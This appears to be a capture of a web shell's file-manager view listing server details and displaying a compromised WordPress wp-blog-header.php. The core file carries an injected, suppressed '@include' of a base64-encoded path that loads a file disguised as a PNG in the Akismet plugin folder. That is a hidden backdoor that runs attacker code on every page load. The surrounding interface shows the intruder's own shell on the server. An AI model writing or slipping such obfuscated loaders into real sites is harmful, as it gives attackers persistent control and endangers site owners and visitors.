HEX
Server: Apache
System: Linux server3230.server-vps.com 5.15.0-46-generic #49-Ubuntu SMP Thu Aug 4 18:03:25 UTC 2022 x86_64
User: lzgqnjwu (1002)
PHP: 7.4.33
Disabled: NONE
Upload Files
File: //proc/thread-self/cwd/wp-blog-header.php
<?php @include base64_decode("Ly9ob21lL2x6Z3Fuand1L3NpdGVzL3huLS0tLWN0YnRjMGJoYmc4aDljLnhuLS1qMWFtaC93cC1jb250ZW50L3BsdWdpbnMvYWtpc21ldC9faW5jL2ltZy9sb2dvLXFzcnNvbnJyb28ucG5n");?><?php
/**
 * Loads the WordPress environment and template.
 *
 * @package WordPress
 */

if ( ! isset( $wp_did_header ) ) {

	$wp_did_header = true;

	// Load the WordPress library.
	require_once __DIR__ . '/wp-load.php';

	// Set up the WordPress query.
	wp();

	// Load the theme template.
	require_once ABSPATH . WPINC . '/template-loader.php';

}